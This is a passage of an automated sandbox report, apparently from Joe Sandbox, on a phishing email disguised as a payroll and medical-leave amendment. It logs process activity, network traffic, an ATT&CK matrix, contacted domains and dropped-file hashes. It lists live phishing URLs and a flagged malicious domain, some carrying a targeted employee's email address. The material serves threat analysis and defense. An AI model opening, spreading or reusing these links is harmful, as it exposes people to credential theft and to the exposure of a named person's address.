Source: unknownNetwork traffic detected: HTTP traffic on port 51179 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51236 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51253 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51182 -> 443
Source: unknownHTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.17:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.17:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.160.20:443 -> 192.168.2.17:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.17:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51195 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51211 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51215 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51217 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.17:51239 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:51240 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.179:443 -> 192.168.2.17:51241 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.winMSG@34/11@48/352
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240827T1207160313-6240.etl
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\ocedures.msg"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3429B1E5-3585-42FF-BFDA-C768B92027DE" "27161F02-5B78-4276-881C-C72DECBE88B8" "6240" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\8IYQW4LA\Employees_Payment_Amendment.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1812,i,3389952850226509095,16005016395332430029,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3429B1E5-3585-42FF-BFDA-C768B92027DE" "27161F02-5B78-4276-881C-C72DECBE88B8" "6240" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\8IYQW4LA\Employees_Payment_Amendment.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1812,i,3389952850226509095,16005016395332430029,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid AccountsWindows Management Instrumentation1
Scripting		1
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Process Injection		LSASS Memory1
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder		1
Registry Run Keys / Startup Folder		1
Deobfuscate/Decode Files or Information		Security Account Manager13
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Extra Window Memory Injection		1
DLL Side-Loading		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Extra Window Memory Injection		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
mainet.ne.jp
203.142.211.38
truefalse
    		unknown
    a.nel.cloudflare.com
    		35.190.80.1
    		truefalse
      		unknown
      infinitipulsarjoy.ru
      		188.114.97.3
      		truetrue
        		unknown
        plus.l.google.com
        		142.250.186.110
        		truefalse
          		unknown
          pulsecortexe.space
          		188.114.96.3
          		truefalse
            		unknown
            antibots.net
            		188.114.96.3
            		truefalse
              		unknown
              fp2e7a.wpc.phicdn.net
              		192.229.221.95
              		truefalse
                		unknown
                play.google.com
                		74.125.136.113
                		truefalse
                  		unknown
                  code.jquery.com
                  		151.101.66.137
                  		truefalse
                    		unknown
                    cdnjs.cloudflare.com
                    		104.17.25.14
                    		truefalse
                      		unknown
                      challenges.cloudflare.com
                      		104.18.95.41
                      		truefalse
                        		unknown
                        api.ipify.org
                        		104.26.12.205
                        		truefalse
                          		unknown
                          www.google.com
                          		142.250.9.99
                          		truefalse
                            		unknown
                            designgallerias.com
                            		160.153.0.153
                            		truefalse
                              		unknown
                              apis.google.com
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.comtrue
                                  		unknown
                                  https://pulsecortexe.space/false
                                    		unknown
                                    https://pulsecortexe.space/ZPtar/true
                                      		unknown
                                      https://mainet.ne.jp/false
                                        		unknown
                                        https://designgallerias.com/Oiaduon30aDN0wXONyIN/#gjohnson@murexltd.comfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          160.153.0.153
                                          		designgallerias.comUnited States
                                          		21501GODADDY-AMSDEfalse
                                          142.250.186.46
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          20.189.173.9
                                          		unknownUnited States
                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          104.18.94.41
                                          		unknownUnited States
                                          		13335CLOUDFLARENETUSfalse
                                          151.101.130.137
                                          		unknownUnited States
                                          		54113FASTLYUSfalse
                                          151.101.66.137
                                          		code.jquery.comUnited States
                                          		54113FASTLYUSfalse
                                          142.250.186.110
                                          		plus.l.google.comUnited States
                                          		15169GOOGLEUSfalse
                                          35.190.80.1
                                          		a.nel.cloudflare.comUnited States
                                          		15169GOOGLEUSfalse
                                          104.26.13.205
                                          		unknownUnited States
                                          		13335CLOUDFLARENETUSfalse
                                          142.250.9.99
                                          		www.google.comUnited States
                                          		15169GOOGLEUSfalse
                                          172.217.18.110
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          52.113.194.132
                                          		unknownUnited States
                                          		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          104.26.12.205
                                          		api.ipify.orgUnited States
                                          		13335CLOUDFLARENETUSfalse
                                          34.104.35.123
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          1.1.1.1
                                          		unknownAustralia
                                          		13335CLOUDFLARENETUSfalse
                                          52.109.68.130
                                          		unknownUnited States
                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          104.18.95.41
                                          		challenges.cloudflare.comUnited States
                                          		13335CLOUDFLARENETUSfalse
                                          203.142.211.38
                                          		mainet.ne.jpJapan24282KIRKAGOYAJAPANIncJPfalse
                                          142.250.186.106
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          239.255.255.250
                                          		unknownReserved
                                          		unknownunknownfalse
                                          188.114.97.3
                                          		infinitipulsarjoy.ruEuropean Union
                                          		13335CLOUDFLARENETUStrue
                                          142.250.185.174
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          142.250.185.131
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          188.114.96.3
                                          		pulsecortexe.spaceEuropean Union
                                          		13335CLOUDFLARENETUSfalse
                                          64.233.184.84
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          108.177.122.94
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          74.125.136.113
                                          		play.google.comUnited States
                                          		15169GOOGLEUSfalse
                                          52.109.76.240
                                          		unknownUnited States
                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          172.217.16.195
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          104.17.25.14
                                          		cdnjs.cloudflare.comUnited States
                                          		13335CLOUDFLARENETUSfalse

                                          Private

                                          IP
                                          192.168.2.17
                                          192.168.2.16
                                          192.168.2.23
                                          192.168.2.13

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1499937
                                          Start date and time:2024-08-27 18:06:31 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:21
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Sample name:ocedures.msg
                                          renamed because original name is a hash value
                                          Original Sample Name:Please Read Murexltd Employees New Payroll Amendment Paid Medical Leave And Emergency Loan Procedures.msg
                                          Detection:MAL
                                          Classification:mal52.phis.winMSG@34/11@48/352
                                          Cookbook Comments:
                                          • Found application associated with file extension: .msg

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.114.59.183, 52.109.76.240
                                          • Excluded domains from analysis (whitelisted): neu-azsc-config.officeapps.live.com, ocsp.digicert.com, slscr.update.microsoft.com, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ocsp.edge.digicert.com, sls.update.microsoft.com, officeclient.microsoft.com, europe.configsvc1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetValueKey calls found.
                                          • VT rate limit hit for: ocedures.msg

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):231348
                                          Entropy (8bit):4.382974685493097
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3B00D413D95AF59BEA4415DDF5AEBF91
                                          SHA1:C24E835D0A0F5E57F9641F867F4C9E5431EF8A05
                                          SHA-256:152A8BCBD176E10FA8F9D8856A4A4ACD478476A158B42E571270DCF1110BC292
                                          SHA-512:3F3892D77F319A83CDF9070D4394BEF6B9936A454B361881185DB8A9FFA14D754F5AEC57E29ADA3EEE608E34B68D2A0FE18770C1043BA773C5457AAA27EE8742
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:TH02...... .p.H.........SM01X...,....}:.............IPM.Activity...........h...............h............H..h...........$...h...........H..h\tor ...AppD...h...0..........h..&M...........h........_`.k...hv.&M@...I.+w...h....H...8..k...0....T...............d.........2h...............k........8-Au..!h.............. h.......(.....#h....8.........$h.......8....."h........x.....'h..Y...........1h..&M<.........0h....4.....k../h....h......kH..h....p.........-h .......T.....+h2.&M........................ ..............F7..............FIPM.Activity....Form..wwStandard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000....Microsoft...This form is used to create journal entries......f..kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\0387D3AD-00AB-4CE1-8E02-BBE0DB172F22

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):176365
                                          Entropy (8bit):5.287474962795063
